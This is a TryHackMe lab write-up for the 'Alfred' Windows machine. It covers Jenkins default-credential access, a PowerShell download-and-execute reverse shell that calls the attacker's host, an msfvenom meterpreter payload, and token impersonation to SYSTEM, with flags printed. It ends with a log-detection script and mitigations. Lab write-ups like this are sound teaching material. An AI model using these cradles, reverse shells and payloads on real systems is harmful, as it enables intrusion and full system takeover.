Alfred

A step-by-step guide to exploiting Jenkins misconfiguration and performing Windows token impersonation privilege escalation.

Alfred - TryHackMe Writeup

Alfred is a Windows-based machine focused on exploiting Jenkins misconfiguration and performing Windows token impersonation for privilege escalation.

Difficulty: Medium ⭐⭐
Operating System: Windows
Themes: Jenkins Exploitation, Windows Token Impersonation, Privilege Escalation


Objectives

  1. Gain initial access via Jenkins default credentials
  2. Establish a reverse shell using PowerShell
  3. Escalate privileges through Windows token impersonation
  4. Capture both user and root flags

Reconnaissance

Nmap Scan

Started with a comprehensive Nmap scan:

nmap -Pn -sCV -T5 10.10.96.249

Results:

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 7.5
3389/tcp open  tcpwrapped
8080/tcp open  http       Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Key Findings:

  • Port 80: Microsoft IIS web server (default page)
  • Port 8080: Jetty server hosting Jenkins
  • Port 3389: RDP service enabled

Web Enumeration

Port 80 - IIS Server:
Displays the default Microsoft IIS welcome page.

Port 8080 - Jenkins Dashboard:
[Screenshot: Jenkins login page]

Credentials Discovery:
The masked password field on the login form shows five asterisks, hinting at 5-character credentials. The default credentials admin:admin grant access to the Jenkins dashboard.


Initial Access

Jenkins Command Execution

After logging into Jenkins:

  1. Navigate to Project Configuration:
    [Screenshot: Jenkins project configuration]

  2. Prepare Reverse Shell:
    Used Nishang's Invoke-PowerShellTcp.ps1 script (only the parameter block is reproduced here; the full script comes from the Nishang repository):

    # Nishang reverse shell script (parameter block excerpt)
    function Invoke-PowerShellTcp
    {
        [CmdletBinding(DefaultParameterSetName="reverse")]
        Param(
            [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
            [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
            [String]
            $IPAddress,
            [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
            [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
            [Int]
            $Port
        )
        # ... body omitted; see the Nishang repository for the full script
    }

  3. Setup Infrastructure:
    
    # Start Python web server
    python3 -m http.server 4444
       
    # Start Netcat listener
    nc -nlvp 9999
    
  4. Execute Reverse Shell via Jenkins:
    Added this command in Jenkins build configuration:
    
    powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.145.45:4444/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.145.45 -Port 9999
    

    [Screenshot: Jenkins build step containing the command]

  5. Trigger Build:
    [Screenshot: Build Now button]

Shell Access Obtained

Windows PowerShell running as user bruce on ALFRED
PS C:\Program Files (x86)\Jenkins\workspace\project>

User Flag Capture

PS C:\Users\bruce\Desktop> type user.txt
79007a09481963edf2e1321abd9ae2a0

Meterpreter Migration

Generating Payload

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.145.45 LPORT=6060 -f exe -o shell.exe

Transfer and Execution

  1. Host payload:
    
    python3 -m http.server 9999
    
  2. Download on target:
    
    (New-Object System.Net.WebClient).DownloadFile('http://10.11.145.45:9999/shell.exe','shell.exe')
    
  3. Setup Metasploit handler:
    
    msf6 > use exploit/multi/handler
    msf6 > set payload windows/meterpreter/reverse_tcp
    msf6 > set LHOST 10.11.145.45
    msf6 > set LPORT 6060
    msf6 > run
    
  4. Execute payload:
    
    Start-Process shell.exe
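
As an added example (not part of the original writeup), the following Python script shows how a defender could spot the two techniques above in PowerShell ScriptBlock logs (Event ID 4104 style): the download-and-execute cradle from the Jenkins build step, and the DownloadFile/Start-Process pair used to drop shell.exe. The log lines, their field layout and the rule names are constructed for this example.

```python
import re

# Constructed sample log, one PowerShell ScriptBlock (Event ID 4104 style) entry
# per line: "<timestamp> <host> <user> <script text>". Not real captures.
SAMPLE_LOG = """\
2024-01-01T10:00:01 ALFRED bruce Get-ChildItem C:\\Users\\bruce\\Desktop
2024-01-01T10:00:05 ALFRED bruce powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.145.45:4444/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.145.45 -Port 9999
2024-01-01T10:02:30 ALFRED bruce (New-Object System.Net.WebClient).DownloadFile('http://10.11.145.45:9999/shell.exe','shell.exe')
2024-01-01T10:02:35 ALFRED bruce Start-Process shell.exe
2024-01-01T10:05:00 ALFRED bruce Get-Date
"""

# Detection rules (name, regex) mirroring the commands used in this writeup.
RULES = [
    ("download_cradle_exec", re.compile(r"(?i)\b(iex|invoke-expression)\b.*downloadstring\s*\(")),
    ("remote_file_download", re.compile(r"(?i)downloadfile\s*\(\s*['\"]https?://")),
    ("exe_launch_from_cwd", re.compile(r"(?i)\bstart-process\s+[\w.-]+\.exe\b")),
    ("nishang_reverse_shell", re.compile(r"(?i)invoke-powershelltcp\b.*-reverse\b")),
]
URL_RX = re.compile(r"https?://[^'\")\s]+")

def parse_line(line):
    """Split one log line into (timestamp, host, user, script text)."""
    ts, host, user, script = line.split(" ", 3)
    return ts, host, user, script

def scan_log(text):
    """Return one finding per line that trips at least one rule, in log order."""
    findings = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        ts, host, user, script = parse_line(raw)
        hits = [name for name, rx in RULES if rx.search(script)]
        if hits:
            findings.append({"time": ts, "host": host, "user": user,
                             "rules": hits, "script": script})
    return findings

def extract_urls(findings):
    """Collect the remote URLs referenced by flagged script blocks, for triage."""
    urls = set()
    for f in findings:
        urls.update(URL_RX.findall(f["script"]))
    return sorted(urls)

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["user"], f["rules"], f["script"][:60])
```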
    

Meterpreter Session Established

meterpreter > getuid
Server username: ALFRED\bruce

Privilege Escalation

Token Impersonation with Incognito

  1. Load incognito extension:
    
    meterpreter > load incognito
    
  2. List available tokens:
    
    meterpreter > list_tokens -g
       
    Delegation Tokens Available
    ========================================
    BUILTIN\Administrators
    BUILTIN\Users
    NT AUTHORITY\Authenticated Users
    ... [truncated for brevity]
    
  3. Impersonate Administrator token:
    
    meterpreter > impersonate_token "BUILTIN\Administrators"
    [+] Successfully impersonated user NT AUTHORITY\SYSTEM
    
  4. Verify privilege escalation:
    
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    

Root Flag Capture

meterpreter > cd C:\Users\Administrator\Desktop
meterpreter > type root.txt
dff0f748678f280250f25a45b8046b4a

Alternative Path: The root flag is also located at C:\Windows\system32\config\root.txt


Key Takeaways

Attack Path Summary:

Port Scanning → Jenkins Discovery → Default Credentials → 
Command Execution → PowerShell Reverse Shell → Meterpreter Migration → 
Token Impersonation → SYSTEM Access

Vulnerabilities Exploited:

  1. Default Jenkins Credentials - admin:admin left unchanged
  2. Jenkins Build Command Execution - Unrestricted command execution in build steps
  3. Windows Token Exposure - An Administrators delegation token available to the Jenkins build user for impersonation

Mitigation Strategies:

  1. For Jenkins:
    • Change default credentials immediately
    • Restrict build permissions
    • Implement role-based access control
    • Regular security updates
  2. For Windows Token Security:
    • Implement User Account Control (UAC)
    • Restrict token privileges
    • Regular security auditing
    • Principle of least privilege for service accounts
  3. General Security:
    • Network segmentation
    • Regular vulnerability assessments
    • Security awareness training

Tools Used:

  • Nmap - Port scanning and service enumeration
  • Nishang - PowerShell reverse shell script
  • Metasploit - Payload generation and handler
  • Incognito - Token impersonation extension
  • Netcat - Reverse shell listener

Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb


This post is licensed under CC BY 4.0 by the author.